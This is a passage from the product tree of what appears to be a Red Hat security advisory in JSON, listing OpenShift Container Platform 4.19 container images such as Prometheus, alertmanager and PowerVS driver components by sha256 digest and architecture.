"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
